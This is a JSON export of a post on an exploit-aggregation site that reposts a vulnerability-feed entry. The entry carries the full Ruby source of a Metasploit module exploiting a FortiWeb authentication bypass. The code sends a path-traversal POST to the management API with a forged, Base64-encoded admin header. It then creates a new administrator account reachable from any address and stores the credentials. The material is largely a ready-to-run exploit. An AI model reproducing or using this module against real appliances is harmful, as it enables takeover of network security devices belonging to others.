{"id":26284,"date":"2025-11-14T13:39:18","date_gmt":"2025-11-14T13:39:18","guid":{"rendered":"http:\/\/localhost\/?p=26284"},"modified":"2025-11-14T13:39:18","modified_gmt":"2025-11-14T13:39:18","slug":"fortinet-fortiweb-create-new-local-admin","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=26284","title":{"rendered":"Fortinet FortiWeb create new local admin_MSF:AUXILIARY-ADMIN-HTTP-FORTINET_FORTIWEB_CREATE_ADMIN-"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2025-11-14T19:04:27&#8243;,&#8221;description&#8221;:&#8221;This auxiliary module exploits an authentication bypass via path traversal vulnerability in the Fortinet           FortiWeb management interface to create&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-11-14T18:57:52&#8243;,&#8221;modified&#8221;:&#8221;2025-11-14T18:57:52&#8243;,&#8221;type&#8221;:&#8221;metasploit&#8221;,&#8221;title&#8221;:&#8221;Fortinet FortiWeb create new local admin&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;MSF:AUXILIARY-ADMIN-HTTP-FORTINET_FORTIWEB_CREATE_ADMIN-&#8220;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[],&#8221;sourceData&#8221;:&#8221;##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\n\\nclass MetasploitModule \\u003c Msf::Auxiliary\\n\\n  include Msf::Exploit::Remote::HttpClient\\n  include Msf::Auxiliary::Report\\n  prepend Msf::Exploit::Remote::AutoCheck\\n\\n  def initialize(info = {})\\n    super(\\n      update_info(\\n        info,\\n        &#8216;Name&#8217; =\\u003e &#8216;Fortinet FortiWeb create new local admin&#8217;,\\n        &#8216;Description&#8217; =\\u003e %q{\\n          This auxiliary module exploits an authentication bypass via path traversal vulnerability in the Fortinet\\n          FortiWeb management interface to create a new local administrator user account. This vulnerability\\n          appears to be patched in the latest version of the product, version 8.0.2.\\n        },\\n        &#8216;License&#8217; =\\u003e MSF_LICENSE,\\n        &#8216;Author&#8217; =\\u003e [\\n          &#8216;Defused&#8217;, # PoC from honeypot\\n          &#8216;sfewer-r7&#8217;, # MSF module\\n        ],\\n        &#8216;References&#8217; =\\u003e [\\n          # [&#8216;C V E&#8217;, &#8216;2025-??&#8217;], # No known CVE assigned yet (as of Nov 14, 2025)\\n          [&#8216;URL&#8217;, &#8216;https:\/\/x.com\/defusedcyber\/status\/1975242250373517373&#8217;], # Original PoC posted online\\n          [&#8216;URL&#8217;, &#8216;https:\/\/github.com\/watchtowrlabs\/watchTowr-vs-Fortiweb-AuthBypass&#8217;], # PoC\\n          [&#8216;URL&#8217;, &#8216;https:\/\/www.pwndefend.com\/2025\/11\/13\/suspected-fortinet-zero-day-exploited-in-the-wild\/&#8217;],\\n          [&#8216;URL&#8217;, &#8216;https:\/\/www.rapid7.com\/blog\/post\/etr-critical-vulnerability-in-fortinet-fortiweb-exploited-in-the-wild\/&#8217;]\\n        ],\\n        # &#8216;D i s c l o s u r e D a t e&#8217; =\\u003e &#8216;2025-??-??&#8217;, # Not yet disclosed by the vendor (as of Nov 14, 2025)\\n        &#8216;DefaultOptions&#8217; =\\u003e {\\n          &#8216;RPORT&#8217; =\\u003e 443,\\n          &#8216;SSL&#8217; =\\u003e true\\n        },\\n        &#8216;Notes&#8217; =\\u003e {\\n          &#8216;Stability&#8217; =\\u003e [CRASH_SAFE],\\n          &#8216;Reliability&#8217; =\\u003e [],\\n          &#8216;SideEffects&#8217; =\\u003e [IOC_IN_LOGS]\\n        }\\n      )\\n    )\\n\\n    register_options([\\n      OptString.new(&#8216;TARGETURI&#8217;, [true, &#8216;Base path&#8217;, &#8216;\/&#8217;]),\\n      OptString.new(&#8216;NEW_USERNAME&#8217;, [true, &#8216;Username to use when creating a new admin account&#8217;, Faker::Internet.username]),\\n      OptString.new(&#8216;NEW_PASSWORD&#8217;, [true, &#8216;Password to use when creating a new admin account&#8217;, Rex::Text.rand_text_alpha(8)])\\n    ])\\n\\n    register_advanced_options(\\n      [\\n        OptString.new(&#8216;FORTIWEB_ACCESS_PROFILE&#8217;, [ true, &#8216;The access profile to use for the new admin account&#8217;, &#8216;prof_admin&#8217; ]),\\n        OptString.new(&#8216;FORTIWEB_DOMAIN&#8217;, [ true, &#8216;The domain to use for the new admin account&#8217;, &#8216;root&#8217; ]),\\n        OptString.new(&#8216;FORTIWEB_DEFAULT_ADMIN_ACCOUNT&#8217;, [ true, &#8216;The default FortiWeb admin account name&#8217;, &#8216;admin&#8217; ])\\n      ]\\n    )\\n  end\\n\\n  def check\\n    res = post_auth_bypass_request({ data: {} })\\n\\n    return CheckCode::Unknown(&#8216;Connection failed&#8217;) unless res\\n\\n    return Exploit::CheckCode::Safe(&#8216;Received a 403 Forbidden response&#8217;) if res.code == 403\\n\\n    Exploit::CheckCode::Appears\\n  end\\n\\n  def run\\n    request_data = {\\n      data: {\\n        &#8216;q_type&#8217; =\\u003e 1,\\n        &#8216;name&#8217; =\\u003e datastore[&#8216;NEW_USERNAME&#8217;],\\n        &#8216;access-profile&#8217; =\\u003e datastore[&#8216;FORTIWEB_ACCESS_PROFILE&#8217;],\\n        &#8216;access-profile_val&#8217; =\\u003e &#8216;0&#8217;,\\n        &#8216;trusthostv4&#8217; =\\u003e &#8216;0.0.0.0\/0&#8217;,\\n        &#8216;trusthostv6&#8217; =\\u003e &#8216;::\/0&#8217;,\\n        &#8216;last-name&#8217; =\\u003e &#8221;,\\n        &#8216;first-name&#8217; =\\u003e &#8221;,\\n        &#8217;email-address&#8217; =\\u003e &#8221;,\\n        &#8216;phone-number&#8217; =\\u003e &#8221;,\\n        &#8216;mobile-number&#8217; =\\u003e &#8221;,\\n        &#8216;hidden&#8217; =\\u003e 0,\\n        &#8216;domains&#8217; =\\u003e datastore[&#8216;FORTIWEB_DOMAIN&#8217;],\\n        &#8216;sz_dashboard&#8217; =\\u003e -1,\\n        &#8216;type&#8217; =\\u003e &#8216;local-user&#8217;,\\n        &#8216;type_val&#8217; =\\u003e &#8216;0&#8217;,\\n        &#8216;admin-usergrp_val&#8217; =\\u003e &#8216;0&#8217;,\\n        &#8216;wildcard_val&#8217; =\\u003e &#8216;0&#8217;,\\n        &#8216;accprofile-override_val&#8217; =\\u003e &#8216;0&#8217;,\\n        &#8216;sshkey&#8217; =\\u003e &#8221;,\\n        &#8216;passwd-set-time&#8217; =\\u003e 0,\\n        &#8216;history-password-pos&#8217; =\\u003e 0,\\n        &#8216;history-password0&#8217; =\\u003e &#8221;,\\n        &#8216;history-password1&#8217; =\\u003e &#8221;,\\n        &#8216;history-password2&#8217; =\\u003e &#8221;,\\n        &#8216;history-password3&#8217; =\\u003e &#8221;,\\n        &#8216;history-password4&#8217; =\\u003e &#8221;,\\n        &#8216;history-password5&#8217; =\\u003e &#8221;,\\n        &#8216;history-password6&#8217; =\\u003e &#8221;,\\n        &#8216;history-password7&#8217; =\\u003e &#8221;,\\n        &#8216;history-password8&#8217; =\\u003e &#8221;,\\n        &#8216;history-password9&#8217; =\\u003e &#8221;,\\n        &#8216;force-password-change&#8217; =\\u003e &#8216;disable&#8217;,\\n        &#8216;force-password-change_val&#8217; =\\u003e &#8216;0&#8217;,\\n        &#8216;password&#8217; =\\u003e datastore[&#8216;NEW_PASSWORD&#8217;]\\n      }\\n    }\\n\\n    res = post_auth_bypass_request(request_data)\\n\\n    return fail_with(Msf::Exploit::Failure::UnexpectedReply, &#8216;Connection failed.&#8217;) unless res\\n\\n    return fail_with(Msf::Exploit::Failure::NotVulnerable, &#8216;Target does not appear vulnerable (403 Forbidden response)&#8217;) if res.code == 403\\n\\n    unless res.code == 200\\n      if res.headers[&#8216;Content-Type&#8217;] == &#8216;application\/json&#8217;\\n        begin\\n          response_data = JSON.parse(res.body)\\n          print_bad(response_data.to_s)\\n        rescue JSON::ParserError\\n          print_bad(&#8216;failed to parse response JSON data&#8217;)\\n        end\\n      end\\n      return fail_with(Msf::Exploit::Failure::UnexpectedReply, \\&#8221;Target returned an unexpected response (#{res.code})\\&#8221;)\\n    end\\n\\n    print_good(\\&#8221;New admin account successfully created: #{datastore[&#8216;NEW_USERNAME&#8217;]}:#{datastore[&#8216;NEW_PASSWORD&#8217;]}\\&#8221;)\\n\\n    print_good(\\&#8221;Login via #{ssl ? &#8216;https&#8217; : &#8216;http&#8217;}:\/\/#{datastore[&#8216;RHOSTS&#8217;]}:#{datastore[&#8216;RPORT&#8217;]}#{normalize_uri(target_uri.path, &#8216;login&#8217;)}\\&#8221;)\\n\\n    store_credentials(datastore[&#8216;NEW_USERNAME&#8217;], datastore[&#8216;NEW_PASSWORD&#8217;], Metasploit::Model::Login::Status::UNTRIED)\\n  end\\n\\n  def post_auth_bypass_request(request_data)\\n    cgi_info = {\\n      &#8216;username&#8217; =\\u003e datastore[&#8216;FORTIWEB_DEFAULT_ADMIN_ACCOUNT&#8217;],\\n      &#8216;profname&#8217; =\\u003e datastore[&#8216;FORTIWEB_ACCESS_PROFILE&#8217;],\\n      &#8216;vdom&#8217; =\\u003e datastore[&#8216;FORTIWEB_DOMAIN&#8217;],\\n      &#8216;loginname&#8217; =\\u003e datastore[&#8216;FORTIWEB_DEFAULT_ADMIN_ACCOUNT&#8217;]\\n    }\\n\\n    send_request_cgi(\\n      &#8216;method&#8217; =\\u003e &#8216;POST&#8217;,\\n      &#8216;uri&#8217; =\\u003e normalize_uri(target_uri.path, &#8216;\/api\/v2.0\/cmdb\/system\/admin%3F\/..\/..\/..\/..\/..\/cgi-bin\/fwbcgi&#8217;),\\n      &#8216;headers&#8217; =\\u003e {\\n        &#8216;CGIINFO&#8217; =\\u003e Base64.strict_encode64(cgi_info.to_json)\\n      },\\n      &#8216;ctype&#8217; =\\u003e &#8216;application\/json&#8217;,\\n      &#8216;data&#8217; =\\u003e request_data.to_json\\n    )\\n  end\\n\\n  def store_credentials(username, password, login_status)\\n    service_data = {\\n      address: datastore[&#8216;RHOST&#8217;],\\n      port: datastore[&#8216;RPORT&#8217;],\\n      service_name: ssl ? &#8216;https&#8217; : &#8216;http&#8217;,\\n      protocol: &#8216;tcp&#8217;,\\n      workspace_id: myworkspace_id\\n    }\\n\\n    credential_data = {\\n      origin_type: :service,\\n      module_fullname: fullname,\\n      username: username,\\n      private_data: password,\\n      private_type: :password\\n    }.merge(service_data)\\n\\n    credential_core = create_credential(credential_data)\\n\\n    login_data = {\\n      core: credential_core,\\n      last_attempted_at: DateTime.now,\\n      status: login_status\\n    }.merge(service_data)\\n\\n    create_credential_login(login_data)\\n  end\\nend\\n&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/auxiliary\/admin\/http\/fortinet_fortiweb_create_admin.rb&#8221;,&#8221;cvss&#8221;:{&#8220;score&#8221;:0,&#8221;severity&#8221;:&#8221;NONE&#8221;,&#8221;vector&#8221;:&#8221;NONE&#8221;,&#8221;version&#8221;:&#8221;NONE&#8221;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/admin\/http\/fortinet_fortiweb_create_admin\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2025-11-14T19:04:27&#8243;,&#8221;description&#8221;:&#8221;This auxiliary module exploits an authentication bypass via path traversal vulnerability in the Fortinet FortiWeb management interface to create&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-11-14T18:57:52&#8243;,&#8221;modified&#8221;:&#8221;2025-11-14T18:57:52&#8243;,&#8221;type&#8221;:&#8221;metasploit&#8221;,&#8221;title&#8221;:&#8221;Fortinet FortiWeb create new local admin&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;MSF:AUXILIARY-ADMIN-HTTP-FORTINET_FORTIWEB_CREATE_ADMIN-&#8220;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[],&#8221;sourceData&#8221;:&#8221;##\\n# This&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,169,13,33,7,11,5],"class_list":["post-26284","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-metasploit","tag-news","tag-none","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Fortinet FortiWeb create new local admin_MSF:AUXILIARY-ADMIN-HTTP-FORTINET_FORTIWEB_CREATE_ADMIN- zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=26284\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Fortinet FortiWeb create new local admin_MSF:AUXILIARY-ADMIN-HTTP-FORTINET_FORTIWEB_CREATE_ADMIN- zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2025-11-14T19:04:27&#8243;,&#8221;description&#8221;:&#8221;This auxiliary module exploits an authentication bypass via path traversal vulnerability in the Fortinet FortiWeb management interface to create&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-11-14T18:57:52&#8243;,&#8221;modified&#8221;:&#8221;2025-11-14T18:57:52&#8243;,&#8221;type&#8221;:&#8221;metasploit&#8221;,&#8221;title&#8221;:&#8221;Fortinet FortiWeb create new local admin&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;MSF:AUXILIARY-ADMIN-HTTP-FORTINET_FORTIWEB_CREATE_ADMIN-&#8220;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[],&#8221;sourceData&#8221;:&#8221;##n# This...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=26284\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-11-14T13:39:18+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"6 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=26284#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=26284\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"Fortinet FortiWeb create new local admin_MSF:AUXILIARY-ADMIN-HTTP-FORTINET_FORTIWEB_CREATE_ADMIN-\",\"datePublished\":\"2025-11-14T13:39:18+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=26284\"},\"wordCount\":1092,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"exploit\",\"metasploit\",\"news\",\"NONE\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=26284#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=26284\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=26284\",\"name\":\"Fortinet FortiWeb create new local admin_MSF:AUXILIARY-ADMIN-HTTP-FORTINET_FORTIWEB_CREATE_ADMIN- zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-11-14T13:39:18+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=26284#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=26284\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=26284#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Fortinet FortiWeb create new local admin_MSF:AUXILIARY-ADMIN-HTTP-FORTINET_FORTIWEB_CREATE_ADMIN-\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Fortinet FortiWeb create new local admin_MSF:AUXILIARY-ADMIN-HTTP-FORTINET_FORTIWEB_CREATE_ADMIN- zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=26284","og_locale":"en_US","og_type":"article","og_title":"Fortinet FortiWeb create new local admin_MSF:AUXILIARY-ADMIN-HTTP-FORTINET_FORTIWEB_CREATE_ADMIN- zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2025-11-14T19:04:27&#8243;,&#8221;description&#8221;:&#8221;This auxiliary module exploits an authentication bypass via path traversal vulnerability in the Fortinet FortiWeb management interface to create&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-11-14T18:57:52&#8243;,&#8221;modified&#8221;:&#8221;2025-11-14T18:57:52&#8243;,&#8221;type&#8221;:&#8221;metasploit&#8221;,&#8221;title&#8221;:&#8221;Fortinet FortiWeb create new local admin&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;MSF:AUXILIARY-ADMIN-HTTP-FORTINET_FORTIWEB_CREATE_ADMIN-&#8220;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[],&#8221;sourceData&#8221;:&#8221;##n# This...","og_url":"https:\/\/zero.redgem.net\/?p=26284","og_site_name":"zero redgem","article_published_time":"2025-11-14T13:39:18+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"6 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=26284#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=26284"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"Fortinet FortiWeb create new local admin_MSF:AUXILIARY-ADMIN-HTTP-FORTINET_FORTIWEB_CREATE_ADMIN-","datePublished":"2025-11-14T13:39:18+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=26284"},"wordCount":1092,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","exploit","metasploit","news","NONE","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=26284#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=26284","url":"https:\/\/zero.redgem.net\/?p=26284","name":"Fortinet FortiWeb create new local admin_MSF:AUXILIARY-ADMIN-HTTP-FORTINET_FORTIWEB_CREATE_ADMIN- zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-11-14T13:39:18+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=26284#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=26284"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=26284#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"Fortinet FortiWeb create new local admin_MSF:AUXILIARY-ADMIN-HTTP-FORTINET_FORTIWEB_CREATE_ADMIN-"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/26284","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=26284"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/26284\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=26284"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=26284"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=26284"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}